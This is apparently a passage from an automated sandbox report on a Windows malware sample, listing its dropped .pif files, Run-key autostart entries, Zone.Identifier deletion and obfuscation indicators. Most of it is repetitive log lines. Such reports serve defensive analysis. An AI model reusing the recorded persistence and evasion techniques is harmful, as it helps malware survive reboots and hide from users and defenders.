                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: xrbjyllC.pif.3.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary,3_2_031D894C
                  Source: alpha.pif.6.drStatic PE information: section name: .didat
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C332C push eax; ret 3_2_031C3368
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031CC349 push 8B031CC1h; ret 3_2_031CC34E
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031EC378 push 031EC56Eh; ret 3_2_031EC566
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C63B0 push 031C640Bh; ret 3_2_031C6403
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C63AE push 031C640Bh; ret 3_2_031C6403
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031ED2FC push 031ED367h; ret 3_2_031ED35F
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DF108 push ecx; mov dword ptr [esp], edx3_2_031DF10D
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031ED144 push 031ED1ECh; ret 3_2_031ED1E4
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031ED1F8 push 031ED288h; ret 3_2_031ED280
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D306C push 031D30B9h; ret 3_2_031D30B1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D306B push 031D30B9h; ret 3_2_031D30B1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031ED0AC push 031ED125h; ret 3_2_031ED11D
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C6784 push 031C67C6h; ret 3_2_031C67BE
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C6782 push 031C67C6h; ret 3_2_031C67BE
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031EC570 push 031EC56Eh; ret 3_2_031EC566
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031CC56C push ecx; mov dword ptr [esp], edx3_2_031CC571
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031CD5A0 push 031CD5CCh; ret 3_2_031CD5C4
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031CCBEC push 031CCD72h; ret 3_2_031CCD6A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031CCA1E push 031CCD72h; ret 3_2_031CCD6A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_03234A50 push eax; ret 3_2_03234B20
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DAADF push 031DAB18h; ret 3_2_031DAB10
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8AD8 push 031D8B10h; ret 3_2_031D8B08
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DAAE0 push 031DAB18h; ret 3_2_031DAB10
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D790C push 031D7989h; ret 3_2_031D7981
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D6948 push 031D69F3h; ret 3_2_031D69EB
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D6946 push 031D69F3h; ret 3_2_031D69EB
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D886C push 031D88AEh; ret 3_2_031D88A6
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D2F60 push 031D2FD6h; ret 3_2_031D2FCE
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D5E7C push ecx; mov dword ptr [esp], edx3_2_031D5E7E
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0041C40C push cs; iretd 9_2_0041C4E2
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00423149 push eax; ret 9_2_00423179
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Cllyjbrx.PIFJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\xrbjyllC.pifJump to dropped file
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Cllyjbrx.PIFJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\xrbjyllC.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file

                  Boot Survival

                  barindex
                  Creates multiple autostart registry keys
                  Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CllyjbrxJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior
                  Drops PE files to the user root directory
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CllyjbrxJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CllyjbrxJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_031DAB1C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
